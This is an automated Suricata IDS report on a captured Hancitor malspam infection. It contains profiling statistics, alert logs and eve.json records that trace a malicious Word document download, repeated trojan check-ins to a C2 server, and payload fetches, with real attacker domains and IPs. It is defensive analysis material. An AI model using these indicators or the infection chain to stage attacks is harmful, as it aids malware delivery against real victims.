Filename: 2018-09-04-Hancitor-malspam-infection-traffic.pcap
Status: Analysis complete
IDS: suricata-4.0.0
Ruleset: etpro-all
Runtime: 23.8566420078 seconds
Hash: 90a60290858e08e0e9d5f7a4d55e5dab
Uploaded: 1548677939

Logfiles


packet_stats.log - (12917 bytes)
Packet profile dump:

IP ver   Proto   cnt            min            max            avg            tot           %% 
------   -----   ----------     ------------   ------------   -----------    -----------   ---
 IPv4       6          5957           644250     1389669025     827244605       4927.9b   99.69
 IPv4      17            24         15634303     1356650946     643017642         15.4b    0.31
Note: Protocol 256 tracks pseudo/tunnel packets.

Per Thread module stats:

Thread Module              IP ver   Proto   cnt            min            max            avg            tot           %% 
------------------------   ------   -----   ----------     ------------   ------------   -----------    -----------   ---
TMM_FLOWWORKER              IPv4       6          5957            66282       20477493        260195          1.5b   95.39
TMM_FLOWWORKER              IPv4      17            24           243459        9865210        843040         20.2m    1.25
TMM_RECEIVEPCAPFILE         IPv4       6          5791             2528       13709086          6480         37.5m    2.31
TMM_RECEIVEPCAPFILE         IPv4      17            24             2567          11321          3133         75.2k    0.00
TMM_DECODEPCAPFILE          IPv4       6          5791             2645          89048          2929         17.0m    1.04
TMM_DECODEPCAPFILE          IPv4      17            24             2807          17269          3950         94.8k    0.01

Flow Worker            IP ver   Proto   cnt            min            max            avg         
--------------------   ------   -----   ----------     ------------   ------------   ----------- 
flow                    IPv4       6          5791             2802         104159          3436         19.9m  1.41  
flow                    IPv4      17            24             3094          19889          4609        110.6k  0.01  
stream                  IPv4       6          5957             2816         635619         12917         77.0m  5.44  
app-layer               IPv4      17            24             9089          54032         20435        490.5k  0.03  
detect                  IPv4       6          5957            44193       20281432        216508          1.3b  91.19 
detect                  IPv4      17            24           217451         544547        364236          8.7m  0.62  
tcp-prune               IPv4       6          5957             2538          85481          3082         18.4m  1.30  
Note: stream includes app-layer for TCP

Per App layer parser stats:

App Layer              IP ver   Proto   cnt            min            max            avg         
--------------------   ------   -----   ----------     ------------   ------------   ----------- 
http                    IPv4       6            67             3196          77995         22766          1.5m  45.13 
tls                     IPv4       6           328             2630         625853          5082          1.7m  49.32 
dns                     IPv4      17            24             3358          21145          7806        187.3k  5.54  
Proto detect            IPv4      17            24             6325          34252         11684        280.4k

Log Thread Module          IP ver   Proto   cnt            min            max            avg            tot           %% 
------------------------   ------   -----   ----------     ------------   ------------   -----------    -----------   ---

Logger/output stats:

Logger                     IP ver   Proto   cnt            min            max            avg            tot         
------------------------   ------   -----   ----------     ------------   ------------   -----------    ----------- 
LOGGER_ALERT_FAST           IPv4       6            67            31786         114434         47357          3.2m  7.25  
LOGGER_UNIFIED2             IPv4       6            67            23168         179072         48027          3.2m  7.35  
LOGGER_JSON_ALERT           IPv4       6            67            50169         150061         67800          4.5m  10.38 
LOGGER_JSON_DNS             IPv4      17            22            33762        9213338        474368         10.4m  23.85 
LOGGER_JSON_HTTP            IPv4       6            66            36110         187224         55182          3.6m  8.32  
LOGGER_JSON_TLS             IPv4       6           164            32764         162618         57186          9.4m  21.43 
LOGGER_JSON_FILE            IPv4       6           127            46780         197021         73764          9.4m  21.41 

Prefilter                        IP ver   Proto   cnt            min            max            avg            tot          %% 
--------------------             ------   -----   ----------     ------------   ------------   -----------    ---------    ---
payload                           IPv4       6          1982             2553         154730         25495        50.5m  26.70 
payload                           IPv4      17            24             4748          56889         27336       656.1k  0.35  
stream                            IPv4       6          1982             2514         440165         26205        51.9m  27.45 
http_uri                          IPv4       6            66             4329          36840         12833       847.0k  0.45  
http_request_line                 IPv4       6            66             4170          27182          6482       427.9k  0.23  
http_client_body                  IPv4       6            68             2919          98866         29888         2.0m  1.07  
http_header (request)             IPv4       6            66            30509         129251         68333         4.5m  2.38  
http_header (request trailer)     IPv4       6            66             2594           3522          2747       181.3k  0.10  
http_header_names (request)       IPv4       6            66            10092        7558346        135138         8.9m  4.71  
http_accept (request)             IPv4       6            66             3113           8557          3837       253.3k  0.13  
http_referer (request)            IPv4       6            66             2904          24901          3678       242.8k  0.13  
http_content_len (request)        IPv4       6            66             3511          33959          6219       410.5k  0.22  
http_content_type (request)       IPv4       6            66             3006          24807          8412       555.2k  0.29  
http_protocol (request)           IPv4       6            66             3425           7265          4933       325.6k  0.17  
http_start (request)              IPv4       6            66             8578          32724         14879       982.1k  0.52  
http_raw_header (request)         IPv4       6            68             6966          36611         14316       973.5k  0.51  
http_method                       IPv4       6            66             3866          70689          6596       435.4k  0.23  
http_cookie (request)             IPv4       6            66             2984           4881          3478       229.6k  0.12  
http_raw_uri                      IPv4       6            66             3010          33310          6349       419.1k  0.22  
http_user_agent                   IPv4       6            66            12726          52449         25256         1.7m  0.88  
http_host                         IPv4       6            66             4664          31607          7431       490.5k  0.26  
dns_query                         IPv4      17            11             8279          12729         10218       112.4k  0.06  
tls_sni                           IPv4       6           165             3341          20443          4539       749.0k  0.40  
http_response_line                IPv4       6            66             3312          52557          9196       607.0k  0.32  
http_header (response)            IPv4       6            66            10968          63893         29368         1.9m  1.02  
http_header (response trailer)    IPv4       6            66             2562           6063          4600       303.6k  0.16  
http_content_type (response)      IPv4       6            66             3314          65861          8082       533.5k  0.28  
http_raw_header (response)        IPv4       6           383             3614          25179          5116         2.0m  1.04  
http_cookie (response)            IPv4       6            66             2853          42589          4066       268.4k  0.14  
http_stat_code                    IPv4       6            66             2941          18104          4143       273.4k  0.14  
tls_cert_issuer                   IPv4       6           164             3308          65313          4921       807.1k  0.43  
tls_cert_subject                  IPv4       6           164             4315          70336          8264         1.4m  0.72  
tls_cert_serial                   IPv4       6           164             2982          24770          4033       661.4k  0.35  
file_data (http response)         IPv4       6           317             2576        8083094        166071        52.6m  27.82 
Total                             IPv4                  6944                                         27252       189.2m

General detection engine stats:

Detection phase            IP ver   Proto   cnt            min            max            avg            tot         
------------------------   ------   -----   ----------     ------------   ------------   -----------    ----------- 
PROF_DETECT_IPONLY          IPv4       6           460             4412         160171         29845         13.7m  0.88  
PROF_DETECT_IPONLY          IPv4      17            22            36896          83653         46653          1.0m  0.07  
PROF_DETECT_RULES           IPv4       6          5957             2519        7629872        108126        644.1m  41.13 
PROF_DETECT_RULES           IPv4      17            24           140217         283472        200375          4.8m  0.31  
PROF_DETECT_STATEFUL_START    IPv4       6           719             5104        6237584        231649        166.6m  10.64 
PROF_DETECT_STATEFUL_CONT    IPv4       6          5957             2505         171565         10357         61.7m  3.94  
PROF_DETECT_STATEFUL_CONT    IPv4      17            24             5772          46779          8468        203.2k  0.01  
PROF_DETECT_STATEFUL_UPDATE    IPv4       6          5037             2538          60039          2857         14.4m  0.92  
PROF_DETECT_STATEFUL_UPDATE    IPv4      17            24             2672           3404          2924         70.2k  0.00  
PROF_DETECT_PREFILTER       IPv4       6          5957             7689        8158471         54233        323.1m  20.63 
PROF_DETECT_PREFILTER       IPv4      17            24            31728         107942         62306          1.5m  0.10  
PROF_DETECT_PF_PAYLOAD      IPv4       6          1982            16844         528535         60245        119.4m  7.62  
PROF_DETECT_PF_PAYLOAD      IPv4      17            24             9938          62783         32635        783.2k  0.05  
PROF_DETECT_PF_TX           IPv4       6          5037             2549        8097391         21930        110.5m  7.05  
PROF_DETECT_PF_TX           IPv4      17            12             2613          18840         15062        180.8k  0.01  
PROF_DETECT_PF_SORT1        IPv4       6          1879             2523          85585          4112          7.7m  0.49  
PROF_DETECT_PF_SORT1        IPv4      17            24             3374          59383          6332        152.0k  0.01  
PROF_DETECT_PF_SORT2        IPv4       6          5957             2509          68388          3019         18.0m  1.15  
PROF_DETECT_PF_SORT2        IPv4      17            24             2766           4684          3426         82.2k  0.01  
PROF_DETECT_NONMPMLIST      IPv4       6          5957             2522          85384          3083         18.4m  1.17  
PROF_DETECT_NONMPMLIST      IPv4      17            24             2835           4105          3204         76.9k  0.00  
PROF_DETECT_ALERT           IPv4       6          5957             2510          64490          2825         16.8m  1.07  
PROF_DETECT_ALERT           IPv4      17            24             2525           9952          3054         73.3k  0.00  
PROF_DETECT_CLEANUP         IPv4       6          5957             2543        4742445          3833         22.8m  1.46  
PROF_DETECT_CLEANUP         IPv4      17            24             2547           5278          3439         82.5k  0.01  
PROF_DETECT_GETSGH          IPv4       6          5957             2514          69321          3306         19.7m  1.26  
PROF_DETECT_GETSGH          IPv4      17            24             2787           6894          5967        143.2k  0.01  


suricata-4.0.0-etpro-all-alert-2019-01-28-T-12-19-23-01282019.1218-2018-09-04-Hancitor-malspam-infection-traffic.pcap.txt - (13625 bytes)
09/04/2018-15:47:45.738863  [**] [1:2810419:1] ETPRO CURRENT_EVENTS Inbound cmd.exe Base64 Encoded (ASCII) 1 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 95.213.235.149:80 -> 10.9.4.102:49165
09/04/2018-15:47:45.825885  [**] [1:2019837:3] ET WEB_CLIENT SUSPICIOUS Possible Office Doc with Embedded VBA Project (Wide) [**] [Classification: Potentially Bad Traffic] [Priority: 2] {TCP} 95.213.235.149:80 -> 10.9.4.102:49165
09/04/2018-15:50:12.796998  [**] [1:2021997:3] ET POLICY External IP Lookup api.ipify.org [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 10.9.4.102:49173 -> 54.243.179.137:80
09/04/2018-15:50:14.397704  [**] [1:2819978:5] ETPRO TROJAN Tordal/Hancitor/Chanitor Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.9.4.102:49174 -> 185.66.9.184:80
09/04/2018-15:50:14.854139  [**] [1:2824549:2] ETPRO CURRENT_EVENTS Hancitor encrypted payload Jan 17 (1) [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 184.95.44.218:80 -> 10.9.4.102:49175
09/04/2018-15:50:21.605555  [**] [1:2014411:11] ET TROJAN Fareit/Pony Downloader Checkin 2 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.9.4.102:49176 -> 185.66.9.184:80
09/04/2018-15:50:22.737948  [**] [1:2824549:2] ETPRO CURRENT_EVENTS Hancitor encrypted payload Jan 17 (1) [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 184.95.44.218:80 -> 10.9.4.102:49177
09/04/2018-15:50:22.992232  [**] [1:2014411:11] ET TROJAN Fareit/Pony Downloader Checkin 2 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.9.4.102:49179 -> 185.66.9.184:80
09/04/2018-15:50:23.145020  [**] [1:2824549:2] ETPRO CURRENT_EVENTS Hancitor encrypted payload Jan 17 (1) [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 184.95.44.218:80 -> 10.9.4.102:49178
09/04/2018-15:52:23.955577  [**] [1:2819978:5] ETPRO TROJAN Tordal/Hancitor/Chanitor Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.9.4.102:49180 -> 185.66.9.184:80
09/04/2018-15:54:24.622718  [**] [1:2819978:5] ETPRO TROJAN Tordal/Hancitor/Chanitor Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.9.4.102:49186 -> 185.66.9.184:80
09/04/2018-15:56:25.184332  [**] [1:2819978:5] ETPRO TROJAN Tordal/Hancitor/Chanitor Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.9.4.102:49187 -> 185.66.9.184:80
09/04/2018-15:58:25.834656  [**] [1:2819978:5] ETPRO TROJAN Tordal/Hancitor/Chanitor Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.9.4.102:49193 -> 185.66.9.184:80
09/04/2018-16:00:26.546628  [**] [1:2819978:5] ETPRO TROJAN Tordal/Hancitor/Chanitor Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.9.4.102:49194 -> 185.66.9.184:80
09/04/2018-16:02:27.047093  [**] [1:2819978:5] ETPRO TROJAN Tordal/Hancitor/Chanitor Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.9.4.102:49199 -> 185.66.9.184:80
09/04/2018-16:04:27.609204  [**] [1:2819978:5] ETPRO TROJAN Tordal/Hancitor/Chanitor Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.9.4.102:49204 -> 185.66.9.184:80
09/04/2018-16:06:28.140128  [**] [1:2819978:5] ETPRO TROJAN Tordal/Hancitor/Chanitor Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.9.4.102:49205 -> 185.66.9.184:80
09/04/2018-16:08:28.737082  [**] [1:2819978:5] ETPRO TROJAN Tordal/Hancitor/Chanitor Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.9.4.102:49210 -> 185.66.9.184:80
09/04/2018-16:10:29.253511  [**] [1:2819978:5] ETPRO TROJAN Tordal/Hancitor/Chanitor Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.9.4.102:49211 -> 185.66.9.184:80
09/04/2018-16:12:29.840240  [**] [1:2819978:5] ETPRO TROJAN Tordal/Hancitor/Chanitor Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.9.4.102:49214 -> 185.66.9.184:80
09/04/2018-16:14:30.442493  [**] [1:2819978:5] ETPRO TROJAN Tordal/Hancitor/Chanitor Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.9.4.102:49219 -> 185.66.9.184:80
09/04/2018-16:16:30.940730  [**] [1:2819978:5] ETPRO TROJAN Tordal/Hancitor/Chanitor Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.9.4.102:49220 -> 185.66.9.184:80
09/04/2018-16:18:31.477162  [**] [1:2819978:5] ETPRO TROJAN Tordal/Hancitor/Chanitor Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.9.4.102:49225 -> 185.66.9.184:80
09/04/2018-16:20:32.164802  [**] [1:2819978:5] ETPRO TROJAN Tordal/Hancitor/Chanitor Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.9.4.102:49226 -> 185.66.9.184:80
09/04/2018-16:22:32.636527  [**] [1:2819978:5] ETPRO TROJAN Tordal/Hancitor/Chanitor Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.9.4.102:49235 -> 185.66.9.184:80
09/04/2018-16:24:33.361949  [**] [1:2819978:5] ETPRO TROJAN Tordal/Hancitor/Chanitor Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.9.4.102:49242 -> 185.66.9.184:80
09/04/2018-16:26:34.004149  [**] [1:2819978:5] ETPRO TROJAN Tordal/Hancitor/Chanitor Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.9.4.102:49251 -> 185.66.9.184:80
09/04/2018-16:28:34.809712  [**] [1:2819978:5] ETPRO TROJAN Tordal/Hancitor/Chanitor Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.9.4.102:49256 -> 185.66.9.184:80
09/04/2018-16:30:35.253105  [**] [1:2819978:5] ETPRO TROJAN Tordal/Hancitor/Chanitor Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.9.4.102:49257 -> 185.66.9.184:80
09/04/2018-16:32:35.684000  [**] [1:2819978:5] ETPRO TROJAN Tordal/Hancitor/Chanitor Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.9.4.102:49260 -> 185.66.9.184:80
09/04/2018-16:34:36.524360  [**] [1:2819978:5] ETPRO TROJAN Tordal/Hancitor/Chanitor Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.9.4.102:49265 -> 185.66.9.184:80
09/04/2018-16:36:37.183254  [**] [1:2819978:5] ETPRO TROJAN Tordal/Hancitor/Chanitor Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.9.4.102:49266 -> 185.66.9.184:80
09/04/2018-16:38:37.704574  [**] [1:2819978:5] ETPRO TROJAN Tordal/Hancitor/Chanitor Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.9.4.102:49271 -> 185.66.9.184:80
09/04/2018-16:40:38.408768  [**] [1:2819978:5] ETPRO TROJAN Tordal/Hancitor/Chanitor Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.9.4.102:49272 -> 185.66.9.184:80
09/04/2018-16:42:38.952076  [**] [1:2819978:5] ETPRO TROJAN Tordal/Hancitor/Chanitor Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.9.4.102:49275 -> 185.66.9.184:80
09/04/2018-16:44:39.517095  [**] [1:2819978:5] ETPRO TROJAN Tordal/Hancitor/Chanitor Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.9.4.102:49280 -> 185.66.9.184:80
09/04/2018-16:46:40.107355  [**] [1:2819978:5] ETPRO TROJAN Tordal/Hancitor/Chanitor Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.9.4.102:49281 -> 185.66.9.184:80
09/04/2018-16:48:40.625098  [**] [1:2819978:5] ETPRO TROJAN Tordal/Hancitor/Chanitor Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.9.4.102:49286 -> 185.66.9.184:80
09/04/2018-16:50:41.377171  [**] [1:2819978:5] ETPRO TROJAN Tordal/Hancitor/Chanitor Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.9.4.102:49287 -> 185.66.9.184:80
09/04/2018-16:52:41.924520  [**] [1:2819978:5] ETPRO TROJAN Tordal/Hancitor/Chanitor Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.9.4.102:49290 -> 185.66.9.184:80
09/04/2018-16:54:42.432160  [**] [1:2819978:5] ETPRO TROJAN Tordal/Hancitor/Chanitor Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.9.4.102:49295 -> 185.66.9.184:80
09/04/2018-16:56:43.021799  [**] [1:2819978:5] ETPRO TROJAN Tordal/Hancitor/Chanitor Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.9.4.102:49312 -> 185.66.9.184:80
09/04/2018-16:58:43.589303  [**] [1:2819978:5] ETPRO TROJAN Tordal/Hancitor/Chanitor Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.9.4.102:49313 -> 185.66.9.184:80
09/04/2018-17:00:44.320140  [**] [1:2819978:5] ETPRO TROJAN Tordal/Hancitor/Chanitor Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.9.4.102:49318 -> 185.66.9.184:80
09/04/2018-17:02:44.817670  [**] [1:2819978:5] ETPRO TROJAN Tordal/Hancitor/Chanitor Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.9.4.102:49321 -> 185.66.9.184:80
09/04/2018-17:04:45.543432  [**] [1:2819978:5] ETPRO TROJAN Tordal/Hancitor/Chanitor Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.9.4.102:49326 -> 185.66.9.184:80
09/04/2018-17:06:46.141769  [**] [1:2819978:5] ETPRO TROJAN Tordal/Hancitor/Chanitor Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.9.4.102:49327 -> 185.66.9.184:80
09/04/2018-17:08:46.835833  [**] [1:2819978:5] ETPRO TROJAN Tordal/Hancitor/Chanitor Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.9.4.102:49328 -> 185.66.9.184:80
09/04/2018-17:10:47.343968  [**] [1:2819978:5] ETPRO TROJAN Tordal/Hancitor/Chanitor Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.9.4.102:49333 -> 185.66.9.184:80
09/04/2018-17:12:47.850511  [**] [1:2819978:5] ETPRO TROJAN Tordal/Hancitor/Chanitor Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.9.4.102:49336 -> 185.66.9.184:80
09/04/2018-17:14:48.440386  [**] [1:2819978:5] ETPRO TROJAN Tordal/Hancitor/Chanitor Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.9.4.102:49341 -> 185.66.9.184:80
09/04/2018-17:16:48.937063  [**] [1:2819978:5] ETPRO TROJAN Tordal/Hancitor/Chanitor Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.9.4.102:49342 -> 185.66.9.184:80
09/04/2018-17:18:49.460066  [**] [1:2819978:5] ETPRO TROJAN Tordal/Hancitor/Chanitor Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.9.4.102:49343 -> 185.66.9.184:80
09/04/2018-17:20:49.990761  [**] [1:2819978:5] ETPRO TROJAN Tordal/Hancitor/Chanitor Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.9.4.102:49348 -> 185.66.9.184:80
09/04/2018-17:22:50.566275  [**] [1:2819978:5] ETPRO TROJAN Tordal/Hancitor/Chanitor Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.9.4.102:49351 -> 185.66.9.184:80
09/04/2018-17:24:51.068489  [**] [1:2819978:5] ETPRO TROJAN Tordal/Hancitor/Chanitor Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.9.4.102:49356 -> 185.66.9.184:80
09/04/2018-17:26:51.574119  [**] [1:2819978:5] ETPRO TROJAN Tordal/Hancitor/Chanitor Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.9.4.102:49373 -> 185.66.9.184:80
09/04/2018-17:28:52.225648  [**] [1:2819978:5] ETPRO TROJAN Tordal/Hancitor/Chanitor Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.9.4.102:49374 -> 185.66.9.184:80
09/04/2018-17:30:52.961995  [**] [1:2819978:5] ETPRO TROJAN Tordal/Hancitor/Chanitor Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.9.4.102:49379 -> 185.66.9.184:80
09/04/2018-17:32:53.469698  [**] [1:2819978:5] ETPRO TROJAN Tordal/Hancitor/Chanitor Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.9.4.102:49382 -> 185.66.9.184:80
09/04/2018-17:34:54.156075  [**] [1:2819978:5] ETPRO TROJAN Tordal/Hancitor/Chanitor Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.9.4.102:49387 -> 185.66.9.184:80
09/04/2018-17:36:54.751984  [**] [1:2819978:5] ETPRO TROJAN Tordal/Hancitor/Chanitor Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.9.4.102:49388 -> 185.66.9.184:80
09/04/2018-17:38:55.322565  [**] [1:2819978:5] ETPRO TROJAN Tordal/Hancitor/Chanitor Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.9.4.102:49389 -> 185.66.9.184:80
09/04/2018-17:40:55.859369  [**] [1:2819978:5] ETPRO TROJAN Tordal/Hancitor/Chanitor Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.9.4.102:49394 -> 185.66.9.184:80
09/04/2018-17:42:56.424881  [**] [1:2819978:5] ETPRO TROJAN Tordal/Hancitor/Chanitor Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.9.4.102:49398 -> 185.66.9.184:80
09/04/2018-17:44:57.175397  [**] [1:2819978:5] ETPRO TROJAN Tordal/Hancitor/Chanitor Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.9.4.102:49403 -> 185.66.9.184:80
09/04/2018-17:46:57.789382  [**] [1:2819978:5] ETPRO TROJAN Tordal/Hancitor/Chanitor Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.9.4.102:49404 -> 185.66.9.184:80


stats.log - (3164 bytes)
------------------------------------------------------------------------------------
Date: 1/28/2019 -- 12:19:23 (uptime: 0d, 00h 00m 03s)
------------------------------------------------------------------------------------
Counter                                    | TM Name                   | Value
------------------------------------------------------------------------------------
decoder.pkts                               | Total                     | 5815
decoder.bytes                              | Total                     | 2853064
decoder.ipv4                               | Total                     | 5815
decoder.ethernet                           | Total                     | 5815
decoder.tcp                                | Total                     | 5791
decoder.udp                                | Total                     | 24
decoder.avg_pkt_size                       | Total                     | 490
decoder.max_pkt_size                       | Total                     | 5158
flow.tcp                                   | Total                     | 230
flow.udp                                   | Total                     | 11
tcp.sessions                               | Total                     | 230
tcp.syn                                    | Total                     | 230
tcp.synack                                 | Total                     | 230
detect.alert                               | Total                     | 67
detect.mpm_list                            | Total                     | 4
detect.nonmpm_list                         | Total                     | 2
detect.match_list                          | Total                     | 4
app_layer.flow.http                        | Total                     | 66
app_layer.tx.http                          | Total                     | 66
app_layer.flow.tls                         | Total                     | 164
app_layer.flow.dns_udp                     | Total                     | 11
app_layer.tx.dns_udp                       | Total                     | 11
flow_mgr.closed_pruned                     | Total                     | 64
flow_mgr.est_pruned                        | Total                     | 11
flow.spare                                 | Total                     | 10074
flow_mgr.flows_checked                     | Total                     | 240
flow_mgr.flows_notimeout                   | Total                     | 2
flow_mgr.flows_timeout                     | Total                     | 238
flow_mgr.flows_timeout_inuse               | Total                     | 164
flow_mgr.flows_removed                     | Total                     | 74
flow_mgr.rows_checked                      | Total                     | 65536
flow_mgr.rows_skipped                      | Total                     | 65296
flow_mgr.rows_maxlen                       | Total                     | 1
tcp.memuse                                 | Total                     | 573440
tcp.reassembly_memuse                      | Total                     | 81920
flow.memuse                                | Total                     | 7143424


eve.json - (193147 bytes)
{"timestamp":"2018-09-04T15:47:38.531268+0000","flow_id":531694018501444,"pcap_cnt":1,"event_type":"dns","src_ip":"10.9.4.102","src_port":56774,"dest_ip":"10.9.4.1","dest_port":53,"proto":"UDP","dns":{"type":"query","id":11522,"rrname":"resolutesearch.com","rrtype":"A","tx_id":0}}
{"timestamp":"2018-09-04T15:47:39.025962+0000","flow_id":531694018501444,"pcap_cnt":2,"event_type":"dns","src_ip":"10.9.4.1","src_port":53,"dest_ip":"10.9.4.102","dest_port":56774,"proto":"UDP","dns":{"type":"answer","id":11522,"rcode":"NOERROR","rrname":"resolutesearch.com","rrtype":"A","ttl":5,"rdata":"95.213.235.149"}}
{"timestamp":"2018-09-04T15:47:45.738863+0000","flow_id":1062466077352284,"pcap_cnt":202,"event_type":"alert","src_ip":"95.213.235.149","src_port":80,"dest_ip":"10.9.4.102","dest_port":49165,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2810419,"rev":1,"signature":"ETPRO CURRENT_EVENTS Inbound cmd.exe Base64 Encoded (ASCII) 1","category":"A Network Trojan was detected","severity":1},"app_proto":"http"}
{"timestamp":"2018-09-04T15:47:45.825885+0000","flow_id":1062466077352284,"pcap_cnt":209,"event_type":"alert","src_ip":"95.213.235.149","src_port":80,"dest_ip":"10.9.4.102","dest_port":49165,"proto":"TCP","tx_id":0,"alert":{"action":"allowed","gid":1,"signature_id":2019837,"rev":3,"signature":"ET WEB_CLIENT SUSPICIOUS Possible Office Doc with Embedded VBA Project (Wide)","category":"Potentially Bad Traffic","severity":2},"app_proto":"http"}
{"timestamp":"2018-09-04T15:47:45.966335+0000","flow_id":1062466077352284,"pcap_cnt":235,"event_type":"http","src_ip":"10.9.4.102","src_port":49165,"dest_ip":"95.213.235.149","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"resolutesearch.com","url":"\/","http_user_agent":"Mozilla\/5.0 (Windows NT 6.1; WOW64; Trident\/7.0; rv:11.0) like Gecko","http_content_type":"application\/msword"}}
{"timestamp":"2018-09-04T15:48:02.158841+0000","flow_id":1062466077352284,"pcap_cnt":236,"event_type":"fileinfo","src_ip":"95.213.235.149","src_port":80,"dest_ip":"10.9.4.102","dest_port":49165,"proto":"TCP","http":{"hostname":"resolutesearch.com","url":"\/","http_user_agent":"Mozilla\/5.0 (Windows NT 6.1; WOW64; Trident\/7.0; rv:11.0) like Gecko","http_content_type":"application\/msword","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":212992},"app_proto":"http","fileinfo":{"filename":"invoice_149027.doc","gaps":false,"state":"CLOSED","stored":false,"size":212992,"tx_id":0}}
{"timestamp":"2018-09-04T15:50:12.339083+0000","flow_id":512358085831819,"pcap_cnt":240,"event_type":"dns","src_ip":"10.9.4.102","src_port":59335,"dest_ip":"10.9.4.1","dest_port":53,"proto":"UDP","dns":{"type":"query","id":2042,"rrname":"api.ipify.org","rrtype":"A","tx_id":0}}
{"timestamp":"2018-09-04T15:50:12.405238+0000","flow_id":512358085831819,"pcap_cnt":241,"event_type":"dns","src_ip":"10.9.4.1","src_port":53,"dest_ip":"10.9.4.102","dest_port":59335,"proto":"UDP","dns":{"type":"answer","id":2042,"rcode":"NOERROR","rrname":"api.ipify.org","rrtype":"CNAME","ttl":5,"rdata":"nagano-19599.herokussl.com"}}
{"timestamp":"2018-09-04T15:50:12.405238+0000","flow_id":512358085831819,"pcap_cnt":241,"event_type":"dns","src_ip":"10.9.4.1","src_port":53,"dest_ip":"10.9.4.102","dest_port":59335,"proto":"UDP","dns":{"type":"answer","id":2042,"rcode":"NOERROR","rrname":"nagano-19599.herokussl.com","rrtype":"CNAME","ttl":5,"rdata":"elb097307-934924932.us-east-1.elb.amazonaws.com"}}
{"timestamp":"2018-09-04T15:50:12.405238+0000","flow_id":512358085831819,"pcap_cnt":241,"event_type":"dns","src_ip":"10.9.4.1","src_port":53,"dest_ip":"10.9.4.102","dest_port":59335,"proto":"UDP","dns":{"type":"answer","id":2042,"rcode":"NOERROR","rrname":"elb097307-934924932.us-east-1.elb.amazonaws.com","rrtype":"A","ttl":5,"rdata":"54.243.179.137"}}
